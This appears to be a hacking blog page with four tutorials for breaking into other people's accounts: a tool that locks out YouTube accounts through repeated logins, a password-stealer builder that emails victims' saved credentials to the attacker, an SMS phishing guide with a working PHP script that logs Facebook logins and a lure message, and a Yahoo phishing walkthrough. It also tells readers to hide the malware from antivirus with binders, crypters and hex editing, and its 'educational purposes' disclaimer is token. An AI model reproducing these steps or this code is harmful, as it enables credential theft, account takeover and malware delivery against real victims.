Design your theme




How to Hack Youtube account:

1. Download Youtube Freezer - software to hack Youtube account.
Password: www.realhackingtips.blogspot.com

2. Unzip the zipped file in downloaded file using Winzix (free download here) to get Youtube Freezer on how to hack youtube account.

3. Now, run the unzipped file and you will see something like this:



4. From drop down box, select Youtube. Simply enter the username whose you want to hack youtube account and hit "Freeze".

5. Youtube Freezer will start constant login attempts and thus freeze and hack Youtube account. To stop freezing, hit Stop Freezing or close the youtube hacking software - Youtube freezer.

Thus friends, you are able to hack youtube account using this Youtube freezer.





Windows Live password stealer,
I am now writing this article on Password stealer download to inform you about one more efficient Live password stealer - Ref Stealer. This windows live password stealer is amazingly working cool. Just read on.. I have provided link for software download.


Email and Windows Live Password Stealer:

This Windows Password Stealer is used to steal all stored passwords on victim computer. When victim opens our sent Windows Live Password stealer on his computer, the password stealer searches for all saved passwords on victim computer and then simply sends those saved passwords alongwith userids to you via email. Thus, you are now equipped with victim email, ids and passwords and can easily hack his email accounts.

Note: This password stealer though named Windows Live password stealer, works for all available email accounts and not only restricted to windows live.


How to use Live password stealer???

1. Free Download Windows Live password stealer to steal victim passwords.
Password: realhackingtips.blogspot.com

2. Run "Ref Stealer.exe" file to get something like:



3. Now, fill in your Gmail Username and password. Tick on checkbox below the password field. Assign name to the server as you want. Hit On "Gmail Check" to check whether you've entered Gmail id and password correctly. If you receive an email, you've done it right and now hit on "Build" to get server.exe ie password stealer server created in current directory.

4. Now, simply bind this password stealer server to any file using Binder software and send this file to the victim. You can refer my article How to send server file to victim for more information on how to send windows password stealer server file.

5. Once the victim runs our sent binded file on his computer, windows live password stealer will search for all stored passwords and send you email containing all user-ids and passwords like this:



6. Thus, now you have all victim email passwords in your inbox and you can now hack victim email accounts easily. Thus, Windows Live password stealer is used to hack email passwords.

Note 1: This password stealer server is detected as virus during runtime. But, its 100% FUD(Fully Undetectable) during scantime. So, you can use Crypter or use Binder trick I've explained to get rid of antivirus detection. Or you can simply use Hexing method which removes virus signature and our virus becomes undetectable.

Update:Most of the public crypters and keyloggers are detected by antiviruses. If you want to have a FUD version of keylogger, please use bestHacking software- Winspy Keylogger which is FUD(Fully UnDetectable). This is personally recommended keylogger from Techotips.

Note 2: If you want to try out this windows password stealer on your own computer, first installDeep Freeze software and then try this hack to prevent possible damage to your computer.

So friends, enjoy this
windows live password stealer download
to hack email passwords. I have tried my best to keep this windows live password stealer tutorial simple. If you have any problem in using Windows live passwords stealer to hack windows password, please mention it in comments.

Enjoy Windows live password stealer download to hack email password...





I have heard a lot of news regarding sms phishing but didnt found any tutorial explaining this. So, i decided to write a tut to share knowledge about this. Any mistakes are regretted and suggestions and comments are welcomed! Hope you like it.


Note: This tutorial is written for educational purposes only and I take no responsibility for any consequences you suffer for executing this.


Here we are making fake mobile login of facebook.


What happens?
Victim receives a sms on his mobile apparently from facebook asking to try out new version of facebook. A link is provided in the sms. The victim opens the link, sees the facebook login page. He makes the login and it shows username/password is wrong. He gets phished...


To proceed ahead, you need to have a web server running on your computer connected to internet and mobile number of the victim.


Process:


SETTING UP YOUR PHISHING PAGE.
Go to http://m.facebook.com/ and copy the source code. Place it your web server's public html folder with ".htm" as extension. Open this html file in notepad and go to the form tag. In that, replace the form method from POST to GET. Change the form action value to write.php (you can change the name if you want). Rename the file as "index.htm". Create another file and name it as "write.php". Open write.php and copy the following content to the same. Save it.






Code:
header("Location: http://m.facebook.com/login.php?m=m&r811c1f38&refid=9&rdd9db9a5&e=iep&r1129f1e6");$handle = fopen("pswd.txt", "a");
foreach($_GET as $variable => $value) {fwrite($handle, $variable);fwrite($handle, "=");fwrite($handle, $value);fwrite($handle, "\r\n");
}fwrite($handle, "\r\n");fclose($handle);
exit;?>


 Also create another file pswd.txt and leave it as it is. This is the file where our usernames and passwords are getting stored.
You can store these files in any directory under public html. Remember to keep the name of directory something like facebook or similar.
Now start the server.


CHECKING IF OUR PHISHING PAGE IS WORKING.
go to cmyip.com to know your ip address. Paste this ip address in address bar. You should see your phishing page or your default index.htm(if the files are stored in any directory under public html). If not, following maybe the reasons for it:
1. You maybe behind a router. So, you need to open router's settings and enable port forwarding to your machine.
2. Your server maybe configured not to allow any outside connections. So, check out access settings and enable outside connections.
3. Your server may not be running properly.
Now, you need to navigate to the directory in which our phishing files are stored. for example, my files are in /smsphish under public html. So, i'll navigate to...
http://myipaddress/smsphish/
There you can see the fake login of facebook. You can enter any fake stuff in username and password field. Press enter. It should redirect you to the actual facebook mobile site. Now, open our pswd.txt file and see if our entered details are logged there. If they are, our work is mostly done. if they are not, check that you have made necessary changes in index.htm and the write.php is not tampered.
Now nearly 90% work is done. We move to the last step...




SENDING THE SMS.
Now you have to find free smsing sites which do not require to register. These sites use their own number for sending messeages. You can find many such sites. One word: Google. Now here comes our social engineering techniques. Just type the message like "Experience the brand new, more secure version of facebook, simply follow the link,.. blah blah" and give link to our phishing page. A sample message would look like this.


Quote
Experience the brand new version of facebook! Faster and secure. Follow the link now:
http://youripaddress/yourdirectory/
-Facebook development team.
You can think of many more luring techniques... just think!
Enter the victim's mobile number and send the message! (recommended use proxy) If he opens the message and link, he will see the normal facebook mobile login and if he enters the correct details, our phishing worked! just keep watch on pswd.txt for their details!

Note: Be careful when running server!





In my article How to hack email account by phishing, i mentioned about use of Email phishing to hack Yahoo email account password. I was asked by a reader via comment to post an article on How to
hack Yahoo account password
using Yahoo phishing. So, I am writing this security article to inform you about use of Yahoo Phishing to hack Yahoo password. I have even provided link for software download... just read on.



Hack Yahoo account password:

1. First usual step of Phishing is to get Yahoo phisher(fake Yahoo page to hack Yahoo password). Refer my article Software to hack Yahoo password for more info on how to hack yahoo password using yahoo hacking software.

2. I have mentioned about Yahoo hacking software to create Yahoo Phisher alongwith software download link. Just enter http://www.yahoo.com/ over there and you'll obtain yahoo phisher.

3. Now, when you have Yahoo phisher, upload this Yahoo phisher to free webhost or webhosting service say t35.com.

4. Send Index.htm page of Phisher to victim in his inbox and ask him to login to his Yahoo account by using our sent Yahoo Phisher. As victim tries to login to his Yahoo account by entering Yahoo password on our Phisher, you are able to hack Yahoo password.

5. Simply, go to your webhost dashboard and you'll find "passes.txt" file created which will contain victim Hacked Yahoo password.... thus you are able to hack Yahoo password.

Just refer my article How to create and use Yahoo phisher where I have explained in-depth Yahoo Phishing tutorial to hack Yahoo password.

So guys, I hope you are now able to hack Yahoo account password using Yahoo phishing. I have tried to keep this
Yahoo Phishing tutorial to hack yahoo password
as simple as possible. If you have any problem in using Yahoo phishing to hack Yahoo password, please mention it in comments.

Enjoy n hack Yahoo password...




Total Pageviews

Recent Comments

Recent Posts